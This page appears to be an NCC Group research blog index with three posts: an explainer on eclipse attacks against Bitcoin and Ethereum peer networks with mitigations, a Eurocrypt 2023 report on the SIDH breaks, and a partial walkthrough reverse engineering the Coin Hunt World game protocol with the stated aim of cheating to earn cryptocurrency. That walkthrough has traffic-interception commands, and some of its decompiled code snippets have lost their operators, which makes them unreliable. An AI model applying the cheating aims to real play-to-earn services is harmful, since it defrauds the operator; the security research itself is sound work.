Normal view

There are new articles available, click to refresh the page.
Before yesterdayNCC Group Research

How to Spot and Prevent an Eclipse Attack

2 June 2023 at 19:41

Studies of blockchain architectures often start with the consensus algorithms and implicitly assume that information flows perfectly through the underlying peer-to-peer network, and peer discovery is sound and fully decentralized. In practice this is not always the case. A few years ago, a team of researchers looked at the Bitcoin1 and Ethereum2 networks in two papers, and uncovered various sources of eclipse attacks. In an eclipse attack, the attacker targets a node and isolates it from the rest of the network’s honest nodes by monopolizing all of its connections, hence eclipsing the victim from the latest true state of the network. In this blog post, we will survey the overlooked design elements that open the network to eclipse attacks and discuss some defense-in-depth measures. NCC Group regularly assesses blockchain network implementations, and unfortunately continues to observe design patterns that can lead to eclipse attacks.

Eclipse attacks on peer-to-peer networks such as Distributed Hash Tables (DHT) have been studied since the mid-2000s, with updates to the routing table (equivalent of ADDR messages3 in Bitcoin) weaponized to poison honest nodes’ peer tables. The trustless, open, and minimally structured architecture of blockchain networks make them even more susceptible to cache-poisoning and eclipse attacks.

When eclipsed, a miner is isolated from the network and its work is no longer productive. This victim essentially works on top of an orphaned chain which has the following implications:

  • Splitting the mining power shrinks the total mining power, and therefore, the attacker can have a higher share of the mining rewards. This facilitates 51%-mining-power attacks as well as selfish-mining attacks4.
  • Competing views of the blockchain confuse merchants that query the victim miner to determine whether a transaction’s state is finalized, before they release the goods. This is akin to double-spending. Similarly, light clients that use the victim miner as an anchor will have a corrupted view of the chain which can be exploited in all sorts of ways.
  • Competing views of the blockchain make smart contracts unreliable since they treat the blockchain’s state as permanent storage.

While the impact of eclipse attacks on proof-of-work networks is well-studied, eclipsing a miner/validator in a proof-of-stake system has remained largely unexplored to date. This is in spite of the fact that it could result in financial loss for the victim and could slow down the consensus protocol.

It is worth emphasizing that the vulnerabilities described here have already been mitigated by the Bitcoin and Ethereum maintainers.

Mechanics of the Attack

The eclipse attacker aims to monopolize all of the victim node’s incoming, then eventually also outgoing connections. The attack’s steps will be different on various blockchains but they all have one element in common: they utilize the blockchain’s peer discovery algorithm to poison the victim’s peer table, wait for the victim node to restart (which any machine inevitably does), and flood it with attacker-controlled requests. Let’s first look at a vulnerable version of Bitcoin and then see how attacking Ethereum required even fewer resources.

Bitcoin Network

In case of Bitcoin, each node has a limited set of up to 8 outgoing connections and up to 117 incoming connections5. Nodes maintain two tables, namely tried and new tables, to monitor the state of their past and present peers. The tried table is partitioned into buckets which each store up to 64 unique peer IP addresses (with incoming or outgoing connections) along with their groups which is defined as /16 IPv4 prefix for the peers’ IP addresses. The index of the bucket for a given peer’s address is determined as a function of its random node identifier, its IP address and port number, and its group. The new table is populated by addresses that are received from the DNS seeders or ADDR messages; and as such their connectivity status is unknown.

The goal of the attacker is to isolate the node by continuously introducing it to controlled malicious nodes. Replacing addresses in the victim’s tried table requires establishing unsolicited incoming connections to the victim from nodes with various IP addresses. Once the attacker connects to the victim from an adversarial address, it can send (unsolicited) ADDR messages with 1000 trash addresses. The victim will naively add these addresses to its new table without testing their liveness. This elaborate scheme is made easier by the fact that nodes contact their peers for network information infrequently, even when they are under attack by the adversary.

The attack will progress once the node restarts and uses the addresses in the tried table (which are persisted on disk) to establish outgoing connections. Nodes may restart for various reasons, such as DoS attacks and ISP outages, or due to planned software updates. Security of a decentralized peer-to-peer network should not depend on 100% node uptime. Once the attacker controls all the victim’s outgoing connections, it shifts to monopolizing its incoming connections to fully isolate it. At that point the rest of the network assumes the victim was offline, and after 30 days, its peers will mark it as “terrible” and will forget it.

The success of this attack depends on the time invested and the number of adversarial IP addresses in a range of groups. The attacker can control the bandwidth cost of the attack by refusing to respond to requests (e.g., inventory request) that will require sending large payloads. The paper Stubborn Mining: Generalizing Selfish Mining and Combining with an Eclipse Attack argues that a group of miners might be incentivized to collude and eclipse a more powerful miner.

Ethereum Network

Ethereum’s peer discovery is more involved than Bitcoin; by default it has 13 outgoing connections and peer-to-peer messages are authenticated. In an attempt to design for a future when sharding would be supported to help scale the network, and also to ensure uniform network connectivity, Ethereum is modeled after Kademlia, which was originally invented for distributed file sharing on BitTorrent. The upshot was that the peer tables were public so nodes could be discovered with a bounded number of hops (logarithmic in the size of the network) and a biased distance measuring algorithm was used to order peers based on their identifier distance to the current node. Additionally, Ethereum node identifiers are simply their ECDSA public keys, allowing multiple nodes to be run on the same machine. This significantly lowers the cost of the attack to only 2 machines with 2 distinct IP addresses. Since nodes favor peers with lower identifier distance to their identifier, peer discovery is biased. The attacker generates an ECDSA key pair, calculates its corresponding node identifier and its distance to the victim’s node identifier, and finally gauges the probability that the victim includes it in its (public) peer table. The attacker repeats this procedure locally until it obtains a list of node identifiers that are most likely to be added to the victim’s peer tables.

The Geth Ethereum clients (prior to version v1.8.0) ran an eviction process every hour to ensure their peers are online and responsive. When a peer failed to respond after a predetermined number of times, it was evicted. So the attacker has to keep its nodes up for an extended period of time, until the victim is fully eclipsed.

In addition to these network attacks, the researchers observed that the UDP connections’ validity checks were highly sensitive to message timestamps. Nodes would reject packets with timestamps that differed more than 20 seconds from their clock. In real world applications, it should be assumed that a (motivated) attacker is able to manipulate a machine’s clock locally. It was shown that by skewing the victim’s clock, it would gradually isolate itself from the rest of the network, and consequently, the network would forget the node over time. Using nonces to track request and response messages, and calculating time differences locally is superior to trying to tolerate network delays with arbitrary limits.

Another takeaway is that when borrowing and adopting an algorithm (in this case using Kademlia with the plan to support sharding in the future), one has to pay close attention to its side-effects and whether they outweigh its initial costs. The Ethereum foundation has recently removed sharding from its roadmap and has replaced it with “DankSharding”6.

Recommended Remediations

The following recommendations are summarized from the two papers, cited in the reference section:

  1. Favor peers with the longest history of successful connections rather than timestamp freshness.
  2. Before evicting a seemingly older address from the table, attempt to connect to it and evict it only if the connection fails. This way the attacker will not be able to evict legitimate addresses. Success of this measure depends on the number of legitimate addresses before the attack begins.
  3. Occasionally establish short-lived connections (aka feeler connections) with addresses in the new table and include them in the tried table if they are alive. This increases the chance of them being online when the node restarts. Evicting new addresses that are trash cleans up the new table.
  4. Keep track of the timestamp of the first time a peer established connection and use two of the oldest peers as anchors when the node restarts (assuming they accept incoming connections).
  5. Increase the size of tried and new tables, and periodically ensure that they are filled with legitimate and online addresses. For instance, by crawling the network to discover new peers.
  6. Drop unsolicited (and large) ADDR messages from incoming connections to make filling the new table with trash addresses harder.
  7. Ensure that the incoming connections are diverse, and a single or a few addresses cannot monopolize all the incoming connections.
  8. Monitor the network and detect anomalies, e.g., a flurry of incoming large (mostly trash) ADDR messages or a drop in network’s mining power (i.e., increase in stale blocks). These can be used as a signal to act against a potential ongoing eclipse attack.
  9. Make at least a minimum number of outgoing connections that did not originate from the unsolicited incoming connections. With this measure, an attacker would have a harder time monopolizing all of the victim’s connections.
  10. Identify nodes by their public key in combination with another parameter, such as their IP address, to stop low-resource attackers who run multiple nodes on the same machine.
  11. When there are no legitimate use cases for iterative lookups, do not publicize a node’s connection table. This would make it harder for an adversary to guess if a connection by their controlled node will be accepted by the victim.
  12. Run seeding upon every reboot (even when the peer table is not empty) to discover fresh peers and avoid being isolated by an attacker. Try running the seeding procedure proactively to prevent the attacker from flooding the victim with incoming connections.

Conclusion

Since the adopted layer-one blockchain represents a base security layer for the add-on layers, it is imperative to design the underlying network protocols while having eclipse attacks in mind. This blog post aimed to bring more attention to this topic by summarizing some of the relevant research that has been conducted in the past decade. Following the above recommendations could greatly reduce the vulnerability of blockchains to eclipse attacks. However, It should be noted that these recommendations must be considered in combination with the given application’s threat model to avoid unintended consequences. Author refers the interested reader to the referenced papers for more details about the peer discovery algorithms and trust network formation in Bitcoin and Ethereum as the two dominant blockchains today.

The author would like to thank Gerald Doussot, Aleksandar Kircanski, Eli Sohl, and Paul Bottinelli of NCC Group’s Cryptography Services team for their review of this post. All mistakes remain with the author.

References


  1. Eclipse Attacks on Bitcoin’s Peer-to-Peer Network, by Ethan Heilman, Alison Kendler, Aviv Zohar, and Sharon Goldberg. 
  2. Low-Resource Eclipse Attacks on Ethereum’s Peer-to-Peer Network, by Yuval Marcus, Ethan Heilman, and Sharon Goldberg. 
  3. A Bitcoin ADDR message can contain a maximum of 1000 addresses. See https://en.bitcoin.it/wiki/Protocol_documentation#addr for more details. 
  4. A selfish miner (or a pool of miners) withhold mined blocks to gain advantage over the reset of the network in mining on the longest chain, see https://www.investopedia.com/terms/s/selfish-mining.asp for a definition. 
  5. Bitcoin still uses the same number of inbound and outbound connections, see MAX_OUTBOUND_FULL_RELAY_CONNECTIONS (for 8 outbound connections) and DEFAULT_MAX_PEER_CONNECTIONS (for 125 total connections; thus 117 inbound connections) in the source code
  6. From https://ethereum.org/en/roadmap/danksharding/: “Neither Danksharding nor Proto-Danksharding follow the traditional “sharding” model that aimed to split the blockchain into multiple parts. Shard chains are no longer part of the roadmap. Instead, Danksharding uses distributed data sampling across blobs to scale Ethereum. This is much simpler to implement. This model has sometimes been referred to as “data-sharding”.” 

Eurocrypt 2023: Death of a KEM

1 June 2023 at 19:56

Last month I was lucky enough to attend Eurocrypt 2023, which took place in Lyon, France. It was my first chance to attend an academic cryptography conference and the experience sat somewhere in between the familiar cryptography of the Real World Crypto conference and the abstract world of black holes and supergravity conferences which I attended in my previous life as a theoretical physicist.

The Death of SIDH

My trip was motivated by the publication of the research paper A Direct Key Recovery Attack on SIDH, which I had worked on last summer with my coauthors Luciano Maino, Chloe Martindale, Lorenz Panny and Benjamin Wesolowski. The paper sits within the context of the attacks on the supersingular isogeny Diffie-Hellman (SIDH) protocol and thus the key-exchange mechanism SIKE, which is built on top of SIDH.

As a brief timeline, in July 2022 Wouter Castryck and Thomas Decru published a paper: An efficient key recovery attack on SIDH which gave a heuristic polynomial time algorithm to break all instances of SIKE within 24 hours using a theorem by Kani from 1997. Their attack used a higher dimensional isogeny between abelian surfaces as a passive oracle to determine Bob’s secret isogeny step-by-step in the isogeny graph. The efficiency of their attack exploited that SIKE had picked an elliptic curve with known endomorphism ring, which allowed them to efficiently compute auxiliary isogenies required for the attack.

One week later, Luciano Maino and Chloe Martindale published a paper: An attack on SIDH with arbitrary starting curve describing an independently derived attack on SIDH. Compared to the work of Castryck and Decru, they assumed no knowledge of the endomorphism ring of the curve, but the price to pay was that their attack had subexponential complexity. However, their work also contained a description of how you did not need to perform this chain of dimension-two isogenies to derive a secret, but rather only one successful oracle call was enough to completely derive the secret path. Following this paper, a third paper Breaking SIDH in polynomial time by Damien Robert showed that the attack of Maino and Martindale could be adapted to be provable polynomial time again by using dimension-eight isogenies between abelian varieties, where the auxiliary isogeny could always be computed.

For a high-level discussion of the Castryck-Decru attack on SIDH, Thomas Decru wrote a fantastic blog post and if you’re interested in how the attack is implemented, I wrote a fairly detailed blog post last year on the implementation of their attack using SageMath. My experience of this implementation is what led to the collaboration with Maino and Martindale, where together with Lorenz Panny we wrote a proof of concept implementation of their attack in SageMath.

The attacks on SIDH were not only beautiful pieces of cryptanalysis but were particularly important as only weeks before, SIKE had been chosen by NIST to continue to the fourth round of their post-quantum cryptography project. The huge impact of this work was acknowledged at this year’s Eurocrypt, where the Castryck-Decru attack won the best paper award and Robert’s and our work was given an honorable mention:

  • An efficient key recovery attack on SIDH
    ★ Best Paper Award
    Wouter Castryck and Thomas Decru
  • A Direct Key Recovery Attack on SIDH
    ★ Best Paper Honorable Mention
    Luciano Maino, Chloe Martindale, Lorenz Panny, Giacomo Pope and Benjamin Wesolowski
  • Breaking SIDH in Polynomial Time
    ★ Best Paper Honorable Mention
    Damien Robert

These three papers were collected into a single plenary session on the second day of the conference and in turn, Thomas, Luciano and Damien took their 20 minutes to discuss their variant of the attacks and what this means for isogeny-based cryptography in the future. You can watch the session via YouTube.

Although the polynomial time break of SIDH is dramatic, the attack relies on the protocol sharing auxiliary data which many isogeny schemes never need. This means that although SIDH is broken, schemes such as CSIDH (another key exchange protocol) and SQISign (a digital signature algorithm) are unaffected by these attacks. In fact, when asked in the questions following their talks, all three authors expressed excitement of the new possibilities that these attacks offered and suggested that constructive applications of these techniques will open up isogeny-based cryptography to new and exciting protocols.

To continue the theme, isogenies also took first place on Tuesday night, when the The Superspecial Isogeny Club Quartet won the best rump session award with their song Kani came in like a wrecking ball.

Selected Talks

There were more than 100 papers published this year, and with the conference running with parallel tracks it was impossible to see every talk, let alone talk about them all here. However, there is time to mention a few talks which stood out to me during the week and I’m afraid that my post-quantum-bias shows up here!

Just how hard are rotations of Zn? Algorithms and cryptography with the simplest lattice
Huck Bennett, Atul Ganju, Pura Peetathawatchai, Noah Stephens-Davidowitz [Presentation]

Imagine you draw the simplest lattice possible: the unit lattice. In two dimensions, this could be drawn by putting a dot on each corner of a square on a grid. In three dimensions it would mean drawing a dot for each vertex of a tiling of cubes. The intuitive basis to draw for these lattices is to take the unit vectors which take orthogonal steps in each direction. By taking these steps sequentially you can reach any dot in the lattice. This basis isn’t only nice, but it is the shortest basis we can draw.

Now, rather than being given this natural basis, imagine you’re given some ugly basis which has been found by first rotating the lattice and performing the same trick of finding vectors connecting dots by travelling directly upwards or sideways. The question is that when presented this long lattice basis, can you determine whether this is a lattice basis for the rotated simple lattice or just some random lattice? One way to answer this question is to determine if the basis describes the rotated unit lattice by finding the shortest basis and seeing if it is the orthogonal unit basis.

Surprisingly, this question seems to be difficult to answer. In fact, despite partial progress of finding efficient algorithms to solve this problem, this talk suggests that this is a cryptographically hard problem. From this, the authors build an encryption scheme based off the assumed hardness of this problem. I love cryptographic problems like this. The idea that you can take the simplest lattice we can construct and hide it almost completely with only a rotation is fascinating. I’m looking forward to seeing the progress / adoption on this problem. Either constructively from the hardness of this problem or cryptanalytically with a breakthrough on recovering the short orthogonal basis for this lattice problem.

Supersingular Curves You can Trust
Andrea Basso, Giulio Codogni, Deirdre Connolly, Luca De Feo, Tako Boris Fouotsa, Guido Maria Lido, Travis Morrison, Lorenz Panny, Sikhar Patranabis and Benjamin Wesolowski [Presentation]

In the isogeny world, a surprisingly hard problem to solve is how to find a way to “hash” to a supersingular elliptic curve. To understand this problem, let’s move over to the more familiar problem of hashing to points. For classical elliptic curve cryptography, there are times where a protocol requires the use of a point in a prime-order subgroup of the curve for which no one knows its relation to some fixed generator of the curve. This means we cannot compute the point as a scalar multiple of the generator but rather find a way to directly compute a point. This can de done efficiently and is discussed in the following IETF draft.

For isogeny-based cryptography, rather than ensuring no one knows a “scalar”, the important knowledge to hide is the endomorphism ring of the elliptic curve. At a high level, the endomorphism ring can be thought of as the collection of all of the isogenies which map from a curve to itself. Currently we have two methods of finding supersingular elliptic curves: compute a curve directly using the theory of complex multiplication or take a known supersingular curve and compute an isogeny to walk to some new curve.

The problem we have is that using complex multiplication to derive a curve necessarily also allows one to learn the endomorphism ring. For the isogeny walk, if you know the starting curve’s endomorphism ring and the isogeny connecting the curves, you also know the endomorphism ring of the final curve.

The authors of this work propose “SECUER: Supersingular Elliptic Curves with Unknown Endomorphism Ring”, a proposal of a trustless setup to “hash” to these curves. The idea is relatively simple. Although no one person can “hash” to a curve, if many people can work together, a curve with unknown endomorphism ring can be computed as long as one participant of the protocol is honest. The trick is to start with some curve and for the first user to randomly walk to a new curve. Although this user knows the endomorphism ring of their ending curve, if their isogeny is kept secret, then anyone given this curve cannot reasonably compute the endomorphism ring. By passing the end result of an isogeny to many users in a sequence, the final curve will have an endomorphism ring which could only be derived if every user has knowledge of every secret isogeny path taken.

Lattice Cryptography: What Happened and What’s Next
Vadim Lyubashevsky [Presentation]

The second invited speaker of Eurocrypt 2023 was Vadim Lyubashevsky of IBM, who gave a brilliant talk focusing on what has happened since Kyber and Dilithium were picked to be standardised by NIST after their selection in round three of the NIST post-quantum cryptography competition. For an overview of the selections, see NCC Group’s earlier blog post written by Thomas Pornin.

The talk discussed not only lattices and quantum-safe cryptography, but also served as a place to discuss the other complicated parts of the NIST competition and standardisation of protocols including patent issues, NIST/NSA conspiracy theories and the ongoing effort of migrating from our current cryptograph to something which is quantum-safe.

The latter half of the talk looked at future work and discussed progress on efficient zero-knowledge protocols using lattices. In particular, two projects which were mentioned were the new work on practical lattice-based zero knowledge proofs based on the hardness of Module-SIS and Module-LWE problems and new progress on practical anonymous credentials built from hard lattice problems.

Disorientation Faults in CSIDH
Gustavo Banegas, Juliane Krämer, Tanja Lange, Michael Meyer, Lorenz Panny, Krijn Reijnders, Jana Sotáková and Monika Trimoska [Presentation]

Although many of the talks at Eurocrypt were fantastically presented with engaging speakers and great cryptography, I think this talk is a principle example of how presentation slides can be used as a visual aide to demystify complex papers in such a way that an audience can really connect with a paper in the 20 minute slot the authors are given. I have included a link to the presentation for all these summarised talks, and really recommend watching this one.

The presentation described a fault attack on CSIDH, an isogeny-based key exchange protocol which is particularly interesting as it is both quantum-safe (although there are sub-exponential quantum attacks against the protocol) and is non-interactive. As with most isogeny-based protocols, the idea of CSIDH is that users Alice and Bob perform secret walks through an isogeny graph and send their end curves to each other. However, unlike SIDH which needed the deadly auxiliary data to allow the exchange to work, CSIDH is naturally commutative and Alice and Bob simply walk their path again from each other’s public curves to reach a shared secret curve.

When performing these walks, Alice and Bob both have a notion of “positive” and “negative” steps on their isogeny graphs. For the more mathematical, these directions are associated to walking from either a curve or its quadratic twist. Practically, random points are sampled and the code checks whether this will take the user in a positive or negative direction and keeps track of the remaining steps to take to finish the walk. The important part of this to understand is that for a single secret walk, the actual protocol requires taking many smaller walks in the isogeny graph in either these positive or negative directions.

By using a fault attack to trick the algorithm in taking positive steps when they should be negative (or vice-versa) the paper shows that information about the smaller sub-paths of the walk is leaked. By repeating fault attacks, an attacker can find information about each of these smaller walks making up the secret path. Given enough data, one can efficiently recover the secret walk by concatenating these smaller paths, breaking the protocol with an active side-channel.

An isogeny path to Zürich

Next year, Eurocrypt 2024 will be held in Zürich, Switzerland. With all the active research in isogeny-based cryptography, I’m excited to see where we are twelve months from now and with a little luck, hopefully I can enjoy Eurocrypt again next year with some new results of my own. For those who couldn’t attend this year, or just want to catch the sessions which collided with the ones they attended, IACR has uploaded all the talks to their YouTube channel.

Acknowledgements

Thanks to Paul Bottinelli of NCC Group for proof-reading an earlier draft of this post.

Reverse Engineering Coin Hunt World’s Binary Protocol

31 May 2023 at 01:00

Introduction

We are going to walk through the process we took to reverse engineer parts of the Android game Coin Hunt World. Our goal was to identify methods and develop tooling to cheat at the game. Most of the post covers reverse engineering the game’s binary protocol and using that knowledge to create tooling for converting the binary protocol into something more human readable. With the ability to decode and replay packets from this protocol, we will then look into how we can cheat at the game. From this post you should get a sense of the process we took to reverse engineer the game and how to use that knowledge to develop tooling that will assist in understanding the game.

Game Overview

Coin Hunt World is an Android/iOS free-to-play and play-to-earn Geolocation game. The players walk around the real world searching for vaults to unlock. Once unlocked, the player will be asked a question from various categories such as mathematics, entertainment, etc. and if this question is answered correctly they will receive a small amount of cryptocurrency. Unlocking vaults requires keys, which can be obtained by unlocking vaults or completing daily walking challenges. To receive the cryptocurrency, you first must obtain 10,000 Resin to use for connecting Coin Hunt World with Uphold, a digital trading platform. After this has been done, your cryptocurrency will be automatically transferred to your Uphold account every Tuesday.

Lets walk through the normal game flow now, to visually demonstrate what the gameplay looks like. After creating an account, and logging into the game, you are presented as a player in this virtual world.

You can then move around this virtual world looking for vaults to unlock.

Once you find one, a key needs to be used to unlock the vault. At this point the game will let you choose a category and ask you a question related to that category.

If the question is answered correctly the user will receive a reward such as a small amount of cryptocurrency.

Each unlock of a Vault will consume a key but new keys can be earned by completing walking goals each day. There are various other aspects to the game but this describes the core functionality.

From a point of attacking the game, it would be interesting to somehow be able to directly modify the amount of cryptocurrency we have, spoof how much we have walked to earn keys, or to modify our location to open Vaults that we are not physically close to.

Intercepting Network Traffic

Before cheating at the game we first need to understand how it works, and most importantly how the game manages state, such as cryptocurrency or how much we have walked. Before doing any reverse engineering, we wanted to play the game to see how the various functionality works and what the network traffic looks like. To do this we routed our traffic through Burp, and started to use the application. We were kind of surprised at how little network traffic this was giving.

None of these requests appeared to contain details for tracking the state of the game. So it seemed likely that there was another channel for communication.

Wireshark

With no interesting traffic being sent to the proxy, there must be some other communication happening outside of our view currently. So we spun up Wireshark to get a better view of what was going on. This can be done by pushing an ARM version of tcpdump to the Android device, and executing (on MacOS):

adb shell 'su root -c /data/local/tmp/tcpdump -i wlan0 -w -" | /Applications/Wireshark.app/Contents/MacOS/Wireshark -k -i

From looking at the traffic, a few interesting things come up. There is unencrypted HTTP traffic on port 8000 and some unknown protocol being used over TCP on port 9933. The HTTP traffic is easy to intercept by setting up a rule in iptables to reroute it to our proxy.

iptables -t nat -A OUTPUT -p tcp -m tcp --dport 8000 -j REDIRECT --to-ports 3000

This gives a little bit more details but not what we are looking for. It seems like the HTTP traffic is just used to track the user with a POST request to /api/v1/user/tracking containing the longitude and latitude coordinate of the user.

Now lets investigate what is happening on port 9933.

Investigating port 9933

We started by looking at the captured traffic in Wireshark, looking for any patterns in the protocol to help understand it.

From comparing several different packets, we can start to understand the header to some extent. Most of the packets start with the byte 0x80 but some of them have 0xA0. In binary it would look like this:

0x80 – 1000 0000
0xA0 – 1010 0000

There is a noticeable difference between the traffic sent with a 0x80 and 0xA0 headers.

For the 0x80 header, ASCII encoded strings can be observed in the traffic and there are some patterns to how the data is structure but the 0xA0 traffic looks much more confusing and difficult to parse out any meaningful information. We can get an idea of whats happening by calculating the entropy of the traffic. This can easily be done with a free data analysis tool like CyberChef.

From this we can see that the data is very random, which clues us in that this is probably encrypted or compressed traffic. Taking a look at the binary representations of 0x80 and 0xA0 from before, we can make the assumption that the 6th bit of the header is used as a flag to send data in this way.

The meaning of the next two bytes were pretty easy to determine. For large packets this value would be high, and for small packets it would be low. From taking the value and counting out the bytes in a small packet, it ended up matching perfectly. So these 2 bytes are used for the length of the data being transmitted over this protocol.

Other than this, it was difficult for us to understand what the rest was doing. We will need to jump into the code to understand the rest of the protocol data.

Initial Binary Investigation

First we need to get the APK from the device. The location the APK is stored at can be determined with pm path <package_name>.

It turns out that the application is split between 3 APKs. So we will need to inspect each one to get an understanding of the application. Based on the APK names, it looks like we are dealing with a game built with the Unity framework. In order to reverse engineer it, we will need to understand how it works and use the appropriate tooling to get readable code. For a cursory look, we just ran apktool d apk_file.

This will extract the contents of the APK, decode the AndroidManifest.xml file and decode the classes.dex files into Smali code. Smali is the intermediate representation for the Dex format that is used by the Dalvik Virtual Machine (DVM), or more recently, the Android Run Time (ART). Usually, developers will write applications in Java which gets compiled and converted into Dex byte code. Decompiling the Dex byte code back to Java is more error prone and will likely not recompile correctly. Whereas decompiling to Smali will give a more exact representation, which can then be modified and compiled back into a working Dex file. Now lets take a look at the interesting things contained in each APK file.

base.apk

This file contains some assets, resources and the Smali code. The most important part is
the file located at base/assets/bin/Data/Managed/Metadata/global-metadata.dat. This file contains strings and function names, which are necessary for reversing the game. For more details on how this file is loaded and used, check out Katy’s blogpost at https://katyscode.wordpress.com/2020/12/27/il2cpp-part-2/. We would also recommend reading the other il2cpp posts on her site if you are interested in understanding these type of games better.

split_UnityDataAssetPack.apk

This APK pretty much just contains some assets. These assets will be useful for later.

split_config.arm64_v8a.apk

This APK contains all of the shared libraries (.so files). In here the most interesting to us is the libil2cpp.so file. This shared library will be used with the global-metadata.dat file to help with analysis.

Unity and IL2CPP

Unity games for Android can be distributed in 2 different ways. The standard way is it
that is is built with various .dll’s which can be decompiled back into C# code. The other way
is by using il2cpp. This essentially compiles the game to native code, which should
improve performance of the game. There are various tools that can help with analysis, but we will be using cpp2il. The advantage of this tool over others is that it gives pseudo-code for each of the functions. However, take the output with caution (at least for ARM binaries), since the pseudo-code is not always accurate. You can also use il2cppdumper to modify the disassembly in Ghidra to help with analysis.

There is just one issue to solve before running cpp2il. The tool accepts 1 APK as input, yet we have 3 APKs, each with different parts of the full application. To handle this, we just created a new APK and copied in all of the necessary components. The main things that cpp2il needs to run are the libil2cpp.so, global-metadata.dat and the Unity assets that are referenced. So we just copied all of the assets from base.apk and split_UnityDataAssetPack.apk into split_config.arm64_v8a.apk. This does not produce a runnable application but it gets an APK that can be analyzed properly by cpp2il. The output is various text files that contain pseudo-code. Here is an example of what some of the output looks like.

Looking for Network Communication

In order to connect over the network, the application must be making use of sockets. So we will use this as an entry point. We used ag to search through the previously decompiled pseudo-code for uses of Socket. The tool ag is pretty similar to grep but it is quite a bit faster and has better default printing. Results from running ag 'Socket('.


It seems that 2 libraries are making use of Sockets, those are System and SmartFox2X. Since System is included in all Unity games, it makes sense to start looking into what SmartFox2X is.

From searching SmartFox2X, we can find the website https://www.smartfoxserver.com/. To quote the website “SmartFoxServer is a comprehensive SDK for rapidly developing multiplayer games and applications”. From navigating the website, we can find a section about the SmartFoxServer 2X protocol.

It shows on this page that it has a default port of 9933, which matches our observations of the network from earlier. There are also some details about the types of data that can be transmitted using this protocol. The website has some details on what the protocol is used for but to be able to fully understand it, we will need to reverse the code. Luckily, they share the client libraries on their website. This will be a lot easier for reversing since the tooling for decompiling a JAR file is much better than for decompiling il2cpp code. The client library is written in other languages but we are most comfortable with reversing Java, so that is where we will begin.

Starting Point to Reverse

The first thing to be done is decompile the SmartFox2X client library. To do this we just used jadx. Luckily for us, the library still has all of the symbols, which will be very helpful for reverse engineering. The goal is to understand the protocol being used on port 9933. From looking at the class names, DefaultSFSDataSerializer seems like a good place to start since the protocol likely does some serialization that it sends out over the wire. This class contains a lot of interesting methods but decodeObject() seems to be a promising starting point since it takes a byte array as input. We’ll come back to describing this function later, but for now just know that it is used to parse objects such as integers, arrays, etc. from the byte array. We will first traverse up the call chain to reach a spot that reads the header of the data being transmitted then reverse engineer back toward the decodeObject() function and a few more relevant functions that it calls.

Finding the PacketHeader

From traversing up the call chain, we get to a function called onDataRead() in the class SFSIOHandler. This appears to be the code that handles the data for each packet sent over the network.

public void onDataRead(ByteArray data) throws SFSException {
    if (data.getLength() == 0) {
        throw new SFSException("Unexpected empty packet data: no readable bytes available!");
    }
    if (this.bitSwarm != null    this.isDebugMode) {
        if (data.getLength() > 1024) {
            this.log.info("Data Read: Size > 1024, dump omitted");
        } else {
            this.log.info("Data Read: " + ByteUtils.fullHexDump(data.getBytes()));
        }
    }
    data.setPosition(0);
    while (data.getLength() > 0) {
        if (getReadState() == 0) {
            data = handleNewPacket(data);
        } else if (getReadState() == 1) {
            data = handleDataSize(data);
        } else if (getReadState() == 2) {
            data = handleDataSizeFragment(data);
        } else if (getReadState() == 3) {
            data = handlePacketData(data);
        } else if (getReadState() == 4) {
            data = handleInvalidData(data);
        }
    }
}

To understand the flow, we must understand what getReadState() does. The getReadState() function returns the variable currentState from the FiniteStateMachine class. The SFSIOHandler class actually has an initialize function which initializes the state and transitions of the FiniteStateMachine.

private void InitStates() {
    this.fsm = new FiniteStateMachine();
    this.fsm.addState(4);
    this.fsm.addState(3);
    this.fsm.addState(1);
    this.fsm.addState(2);
    this.fsm.addState(0);
    this.fsm.addStateTransition(0, 1, 0);
    this.fsm.addStateTransition(1, 3, 1);
    this.fsm.addStateTransition(1, 2, 2);
    this.fsm.addStateTransition(2, 3, 3);
    this.fsm.addStateTransition(3, 0, 4);
    this.fsm.addStateTransition(3, 4, 5);
    this.fsm.addStateTransition(4, 0, 6);
    this.fsm.setCurrentState(0);
}

So there are 5 states (0,1,2,3 and 4) and 7 transitions between those states. So for example, applying transition 4 will cause the state to change from 3 to 0. The function getReadState() will get one of the 5 states and during the parsing of the data from the TCP packets, the state transitions will be applied to move through the states. The diagram below makes visualizing this flow a bit easier.

The parser is initialized with state 0. So when a new packet is received by the onDataRead() function, it will first call the handleNewPacket() function.

private ByteArray handleNewPacket(ByteArray data) throws SFSException {
    if (this.isDebugMode) {
        this.log.info("Handling New Packet of size " + data.getLength());
    }
    byte headerByte = data.readByte();
    if (((headerByte   128) ^ (-1)) > 0) {
        throw new SFSException("Unexpected header byte: " + ((int) headerByte) + "n" + DefaultObjectDumpFormatter.prettyPrintByteArray(data.getBytes()));
    }
    PacketHeader header = createPacketHeader(headerByte);
    this.pendingPacket = new PendingPacket(header);
    this.fsm.applyTransition(0);    // Applies transition 0 which changes state from 0 to 1
    return resizeByteArray(data, 1, data.getLength() - 1);
}

It first does an error check on the header then calls createPacketHeader(), which creates a PacketHeader object.

private PacketHeader createPacketHeader(byte headerByte) {
    return new PacketHeader(true, (headerByte   64) > 0, (headerByte   32) > 0, (headerByte   16) > 0, (headerByte   8) > 0);
}

This is essentially just checking if various bits are set in the header and passing them as a boolean values into the PacketHeader constructor. From there we can easily tell what each bit represents.

public PacketHeader(boolean binary, boolean encrypted, boolean compressed, boolean blueBoxed, boolean bigSized) {
    this.binary = binary;
    this.compressed = compressed;
    this.encrypted = encrypted;
    this.blueBoxed = blueBoxed;
    this.bigSized = bigSized;
}

From earlier, we had sniffed traffic for this protocol and saw both 0x80 and 0xA0 headers. These breakdown as follows:

0x80 = 1000 0000 – Binary flag is set which seems to always be the case
0xA0 = 1010 0000 – Binary and compression flags are set

At this point the PacketHeader object is incomplete since it does not contain the length of the data that will be received. Looking at the end of handleNewPacket(), we see that transition 0 is applied which causes a state change from 0 to 1. So on the next iteration of the while loop, handleDataSize() is called.

private ByteArray handleDataSize(ByteArray data) throws SFSException {
    ByteArray data2;
    if (this.isDebugMode    this.log.isDebugEnabled()) {
        this.log.debug("Handling Header Size. Length: " + data.getLength() + " (" + (this.pendingPacket.getHeader().isBigSized() ? "big" : "small") + ")");
    }
    int dataSize = -1;
    int sizeBytes = 2;
    if (this.pendingPacket.getHeader().isBigSized()) {
        if (data.getLength() >= 4) {
            dataSize = data.readInt();
        }
        sizeBytes = 4;
    } else if (data.getLength() >= 2) {
        dataSize = data.readUShort();
    }
    if (this.isDebugMode    this.log.isDebugEnabled()) {
        this.log.debug("Data size is " + dataSize);
    }
    if (dataSize != -1) {
        this.pendingPacket.getHeader().setExpectedLen(dataSize);
